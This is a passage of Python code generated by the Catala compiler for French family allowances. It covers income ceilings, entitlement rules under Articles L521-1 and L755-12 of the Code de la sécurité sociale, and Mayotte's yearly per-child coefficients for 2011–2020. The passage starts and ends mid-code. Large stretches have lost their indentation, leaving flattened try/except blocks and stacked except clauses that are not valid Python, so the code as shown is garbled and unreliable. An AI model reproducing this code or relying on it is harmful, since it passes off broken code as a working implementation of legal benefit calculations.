local_var_232 = list_filter(local_var_233,
enfants_a_charge_106)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=100, start_column=11,
end_line=100, end_column=61,
law_headings=["Prologue"]))
enfants_a_charge_droit_ouvert_prestation_familiale_231 = log_variable_definition(["AllocationsFamiliales",
"enfants_à_charge_droit_ouvert_prestation_familiale"],
local_var_232)
try:
        def local_var_236(param_237: Enfant):
            # Scope variable "est_enfant_le_plus_âgé": true iff the given child
            # is (structurally equal to) the oldest child computed by the
            # EnfantLePlusÂgé sub-scope.
            try:
                try:
                    try:
                        return (enfant_le_plus_age_dot_le_plus_age_227 ==
                            param_237)
                    except EmptyError:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            except EmptyError:
                raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
                    start_line=154,
                    start_column=11,
                    end_line=154,
                    end_column=33,
                    law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=154, start_column=11,
end_line=154, end_column=33,
law_headings=["Prologue"]))
est_enfant_le_plus_age_235 = log_variable_definition(["AllocationsFamiliales",
"est_enfant_le_plus_âgé"], local_var_236)
try:
try:
            def local_var_250(_: Any):
                # Base case for "plafond_II_d521_3": 78 300,00 € plus
                # 5 595,00 € per eligible child (amounts in cents).
                try:
                    return (money_of_cents_string("7830000") +
                        (money_of_cents_string("559500") *
                        decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                except EmptyError:
                    raise EmptyError
            def local_var_248(_: Any):
                # Base justification: unconditionally true.
                return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                    start_line=156, start_column=11,
                    end_line=156, end_column=28,
                    law_headings=["Prologue"]), True)
            def local_var_246(_: Any):
                # Year-2018 revaluation of the ceiling (2017 circulaire).
                try:
                    if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=94, start_column=5,
                        end_line=94, end_column=69,
                        law_headings=["Circulaire interministérielle N° DSS/SD2B/2017/352 du 22 décembre 2017 relative à la revalorisation au 1er janvier 2018 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
                        "Montant des plafonds de ressources",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2018, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2018, 12, 31)))):
                        return (money_of_cents_string("7877000") +
                            (money_of_cents_string("562800") *
                            decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                    else:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            def local_var_244(_: Any):
                # Year-2019 revaluation of the ceiling (2018 instruction).
                try:
                    if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=127, start_column=5,
                        end_line=127, end_column=69,
                        law_headings=["Instruction interministérielle n° DSS/SD2B/2018/279 du 17 décembre 2018 relative à la revalorisation au 1er janvier 2019 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
                        "Montant des plafonds de ressources",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2019, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2019, 12, 31)))):
                        return (money_of_cents_string("7955800") +
                            (money_of_cents_string("568400") *
                            decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                    else:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            def local_var_242(_: Any):
                # Year-2020 revaluation of the ceiling (2019 instruction).
                try:
                    if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=160, start_column=5,
                        end_line=160, end_column=69,
                        law_headings=["Instruction interministerielle no DSS/SD2B/2019/261 du 18 décembre 2019 relative à la revalorisation au 1er janvier 2020 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à La Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
                        "Montant des plafonds de ressources",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2020, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2020, 12, 31)))):
                        return (money_of_cents_string("8083100") +
                            (money_of_cents_string("577500") *
                            decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                    else:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            def local_var_240(_: Any):
                # Year-2021 revaluation of the ceiling (arrêté of 2020-12-14).
                try:
                    if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=196, start_column=5,
                        end_line=196, end_column=69,
                        law_headings=["Article 1",
                        "Arrêté du 14 décembre 2020 relatif au montant des plafonds de ressources de certaines prestations familiales et aux tranches du barème applicable au recouvrement des indus et à la saisie des prestations",
                        "Montant des plafonds de ressources",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2021, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2021, 12, 31)))):
                        return (money_of_cents_string("8155800") +
                            (money_of_cents_string("582700") *
                            decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                    else:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            # Most recent year first; falls back to the base 2017 formula.
            local_var_239 = handle_default([local_var_240, local_var_242,
                local_var_244, local_var_246],
                local_var_248, local_var_250)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=156, start_column=11,
end_line=156, end_column=28,
law_headings=["Prologue"]))
plafond__i_i_d521_3_238 = log_variable_definition(["AllocationsFamiliales",
"plafond_II_d521_3"], local_var_239)
try:
try:
            def local_var_264(_: Any):
                # Base case for "plafond_I_d521_3": 55 950,00 € plus
                # 5 595,00 € per eligible child (amounts in cents).
                try:
                    return (money_of_cents_string("5595000") +
                        (money_of_cents_string("559500") *
                        decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                except EmptyError:
                    raise EmptyError
            def local_var_262(_: Any):
                # Base justification: unconditionally true.
                return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                    start_line=155, start_column=11,
                    end_line=155, end_column=27,
                    law_headings=["Prologue"]), True)
            def local_var_260(_: Any):
                # Year-2018 revaluation of the ceiling (2017 circulaire).
                try:
                    if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=87, start_column=5,
                        end_line=87, end_column=69,
                        law_headings=["Circulaire interministérielle N° DSS/SD2B/2017/352 du 22 décembre 2017 relative à la revalorisation au 1er janvier 2018 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
                        "Montant des plafonds de ressources",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2018, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2018, 12, 31)))):
                        return (money_of_cents_string("5628600") +
                            (money_of_cents_string("562800") *
                            decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                    else:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            def local_var_258(_: Any):
                # Year-2019 revaluation of the ceiling (2018 instruction).
                try:
                    if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=120, start_column=5,
                        end_line=120, end_column=69,
                        law_headings=["Instruction interministérielle n° DSS/SD2B/2018/279 du 17 décembre 2018 relative à la revalorisation au 1er janvier 2019 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
                        "Montant des plafonds de ressources",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2019, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2019, 12, 31)))):
                        return (money_of_cents_string("5684900") +
                            (money_of_cents_string("568400") *
                            decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                    else:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            def local_var_256(_: Any):
                # Year-2020 revaluation of the ceiling (2019 instruction).
                try:
                    if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=153, start_column=5,
                        end_line=153, end_column=69,
                        law_headings=["Instruction interministerielle no DSS/SD2B/2019/261 du 18 décembre 2019 relative à la revalorisation au 1er janvier 2020 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à La Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
                        "Montant des plafonds de ressources",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2020, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2020, 12, 31)))):
                        return (money_of_cents_string("5775900") +
                            (money_of_cents_string("577500") *
                            decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                    else:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            def local_var_254(_: Any):
                # Year-2021 revaluation of the ceiling (arrêté of 2020-12-14).
                try:
                    if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=180, start_column=5,
                        end_line=180, end_column=69,
                        law_headings=["Article 1",
                        "Arrêté du 14 décembre 2020 relatif au montant des plafonds de ressources de certaines prestations familiales et aux tranches du barème applicable au recouvrement des indus et à la saisie des prestations",
                        "Montant des plafonds de ressources",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2021, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2021, 12, 31)))):
                        return (money_of_cents_string("5827900") +
                            (money_of_cents_string("582700") *
                            decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
                    else:
                        raise EmptyError
                except EmptyError:
                    raise EmptyError
            # Most recent year first; falls back to the base 2017 formula.
            local_var_253 = handle_default([local_var_254, local_var_256,
                local_var_258, local_var_260],
                local_var_262, local_var_264)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=155, start_column=11,
end_line=155, end_column=27,
law_headings=["Prologue"]))
plafond__i_d521_3_252 = log_variable_definition(["AllocationsFamiliales",
"plafond_I_d521_3"], local_var_253)
try:
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=426, start_column=5,
end_line=427, end_column=71,
law_headings=["Article L755-12",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Dispositions particulières à la Guadeloupe, à la Guyane, à la Martinique, à La Réunion, à Saint-Barthélemy et à Saint-Martin",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie législative",
"Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")))):
local_var_267 = False
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
local_var_267 = True
except EmptyError:
local_var_267 = False
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=139, start_column=11,
end_line=139, end_column=34,
law_headings=["Prologue"]))
droit_ouvert_complement_266 = log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_complément"], local_var_267)
try:
        def local_var_269(param_270: Enfant):
            # Scope variable "droit_ouvert_forfaitaire": lump-sum allowance
            # entitlement for a child. Article L755-12 (overseas regime with a
            # single eligible child) forces False; otherwise Article L521-1
            # grants it when the family size threshold, the child's age, prior
            # entitlement and the non-age conditions all hold; else False.
            try:
                try:
                    try:
                        try:
                            if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                                start_line=420, start_column=6,
                                end_line=421, end_column=72,
                                law_headings=["Article L755-12",
                                "Chapitre 5 : Prestations familiales et prestations assimilées",
                                "Titre 5 : Dispositions particulières à la Guadeloupe, à la Guyane, à la Martinique, à La Réunion, à Saint-Barthélemy et à Saint-Martin",
                                "Livre 7 : Régimes divers - Dispositions diverses",
                                "Partie législative",
                                "Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
                                (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
                                integer_of_string("1")))):
                                return False
                            else:
                                raise EmptyError
                        except EmptyError:
                            raise EmptyError
                    except EmptyError:
                        # L755-12 did not apply: evaluate the L521-1 conditions.
                        try:
                            if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
                                start_line=119, start_column=5,
                                end_line=125, end_column=59,
                                law_headings=["Article L521-1",
                                "Chapitre 1er : Allocations familiales",
                                "Titre 2 : Prestations générales d'entretien",
                                "Livre 5 : Prestations familiales et prestations assimilées",
                                "Partie législative",
                                "Code de la sécurité sociale"]), ((list_length(enfants_a_charge_106) >=
                                nombre_enfants_alinea_2_l521_3_204) and
                                ((param_270.age ==
                                prestations_familiales_dot_age_l512_3_2_220) and
                                (param_270.a_deja_ouvert_droit_aux_allocations_familiales and
                                log_end_call(["PrestationsFamiliales",
                                "conditions_hors_âge"],
                                log_variable_definition(["PrestationsFamiliales",
                                "conditions_hors_âge", "output"],
                                log_begin_call(["PrestationsFamiliales",
                                "conditions_hors_âge"],
                                prestations_familiales_dot_conditions_hors_age_219,
                                log_variable_definition(["PrestationsFamiliales",
                                "conditions_hors_âge", "input"],
                                param_270)))))))):
                                return True
                            else:
                                raise EmptyError
                        except EmptyError:
                            raise EmptyError
                except EmptyError:
                    # Neither article applied: no lump-sum entitlement.
                    return False
            except EmptyError:
                raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
                    start_line=127,
                    start_column=11,
                    end_line=127,
                    end_column=35,
                    law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=127, start_column=11,
end_line=127, end_column=35,
law_headings=["Prologue"]))
droit_ouvert_forfaitaire_268 = log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_forfaitaire"], local_var_269)
try:
try:
try:
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("3")):
local_var_272 = ((prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0463")) *
decimal_of_integer((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) -
integer_of_string("3"))))
else:
local_var_272 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=124, start_column=11,
end_line=124, end_column=64,
law_headings=["Prologue"]))
montant_initial_base_quatrieme_enfant_et_plus_mayotte_271 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_quatrième_enfant_et_plus_mayotte"],
local_var_272)
# NOTE(review): Catala-compiler-generated code — edit the .catala_fr sources,
# not this file.  Defines the scope variable
# "montant_initial_base_troisième_enfant_mayotte": initial base amount for the
# third child and beyond in Mayotte.  Each local_var_* below is one rule; the
# year-specific rules raise EmptyError when the current date is outside their
# window, and handle_default (Catala runtime) presumably picks the single
# applicable exception, falling back to local_var_297 — confirm against the
# Catala Python runtime.
try:
    try:
        # Fallback rule: 16 % of the monthly family-benefit base when more
        # than two children open entitlement to family benefits, else 0.
        def local_var_297(_: Any):
            try:
                if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                        integer_of_string("2")):
                    return (prestations_familiales_dot_base_mensuelle_222 *
                        decimal_of_string("0.16"))
                else:
                    return money_of_cents_string("0")
            except EmptyError:
                raise EmptyError
        # Justification of the fallback: always applicable (True).
        def local_var_295(_: Any):
            return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                start_line=123, start_column=11,
                end_line=123, end_column=56,
                law_headings=["Prologue"]), True)
        # Year-specific coefficients (décret n°2002-423, annexe), one rule per
        # calendar year 2011-2020; each fires only if date_courante_105 falls
        # inside that year.  2011: 4.63 % of the monthly base.
        def local_var_293(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=584, start_column=5,
                        end_line=584, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2011, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2011, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.0463"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2012: 5.39 %.
        def local_var_291(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=591, start_column=5,
                        end_line=591, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2012, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2012, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.0539"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2013: 7.5 %.
        def local_var_289(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=598, start_column=5,
                        end_line=598, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2013, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2013, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.075"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2014: 6.9 %.
        def local_var_287(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=605, start_column=5,
                        end_line=605, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2014, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2014, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.069"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2015: 7.66 %.
        def local_var_285(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=612, start_column=5,
                        end_line=612, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2015, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2015, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.0766"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2016: 8.42 %.
        def local_var_283(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=619, start_column=5,
                        end_line=619, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2016, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2016, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.0842"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2017: 9.18 %.
        def local_var_281(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=626, start_column=5,
                        end_line=626, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2017, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2017, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.0918"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2018: 10.89 %.
        def local_var_279(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=633, start_column=5,
                        end_line=633, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2018, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2018, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.1089"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2019: 12.59 %.
        def local_var_277(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=640, start_column=5,
                        end_line=640, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2019, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2019, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.1259"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2020: 14.3 %.
        def local_var_275(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=647, start_column=5,
                        end_line=647, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2020, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2020, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("2")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.143"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # Resolve the Catala default tree: exceptions first (2020 … 2011),
        # then justification + fallback consequence.
        local_var_274 = handle_default([local_var_275, local_var_277,
            local_var_279, local_var_281,
            local_var_283, local_var_285,
            local_var_287, local_var_289,
            local_var_291, local_var_293],
            local_var_295, local_var_297)
    except EmptyError:
        raise EmptyError
except EmptyError:
    # No rule produced a value: surface the Catala "no value provided" error
    # with the variable's position in the source program.
    raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
        start_line=123, start_column=11,
        end_line=123, end_column=56,
        law_headings=["Prologue"]))
montant_initial_base_troisieme_enfant_mayotte_273 = log_variable_definition(["AllocationsFamiliales",
    "montant_initial_base_troisième_enfant_mayotte"], local_var_274)
# NOTE(review): Catala-compiler-generated code — edit the .catala_fr sources,
# not this file.  Defines "montant_initial_base_deuxième_enfant_mayotte":
# initial base amount for the second child in Mayotte.  Same default-logic
# shape as the third-child definition: year-scoped exception rules 2011-2020,
# resolved by handle_default with a fallback coefficient.
try:
    try:
        # Fallback rule: 32 % of the monthly family-benefit base when more
        # than one child opens entitlement, else 0.
        def local_var_323(_: Any):
            try:
                if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                        integer_of_string("1")):
                    return (prestations_familiales_dot_base_mensuelle_222 *
                        decimal_of_string("0.32"))
                else:
                    return money_of_cents_string("0")
            except EmptyError:
                raise EmptyError
        # Justification of the fallback: always applicable (True).
        def local_var_321(_: Any):
            return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
                start_line=122, start_column=11,
                end_line=122, end_column=55,
                law_headings=["Prologue"]), True)
        # Year-specific coefficients (décret n°2002-423, annexe).
        # 2011: 23.2 % of the monthly base.
        def local_var_319(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=513, start_column=5,
                        end_line=513, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2011, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2011, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.232"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2012: 23.79 %.
        def local_var_317(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=520, start_column=5,
                        end_line=520, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2012, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2012, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.2379"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2013: 24.37 %.
        def local_var_315(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=527, start_column=5,
                        end_line=527, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2013, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2013, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.2437"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2014: 24.96 %.
        def local_var_313(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=534, start_column=5,
                        end_line=534, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2014, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2014, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.2496"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2015: 25.55 %.
        def local_var_311(_: Any):
            try:
                if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
                        start_line=541, start_column=5,
                        end_line=541, end_column=69, law_headings=["Annexe",
                        "Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
                        "Dispositions spéciales relatives à Mayotte",
                        "Décrets divers"]), ((date_courante_105 >=
                        date_of_numbers(2015, 1, 1)) and (date_courante_105 <=
                        date_of_numbers(2015, 12, 31)))):
                    if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
                            integer_of_string("1")):
                        return (prestations_familiales_dot_base_mensuelle_222 *
                            decimal_of_string("0.2555"))
                    else:
                        return money_of_cents_string("0")
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        # 2016: 27.3 %.
        def local_var_309(_: Any):
            try:
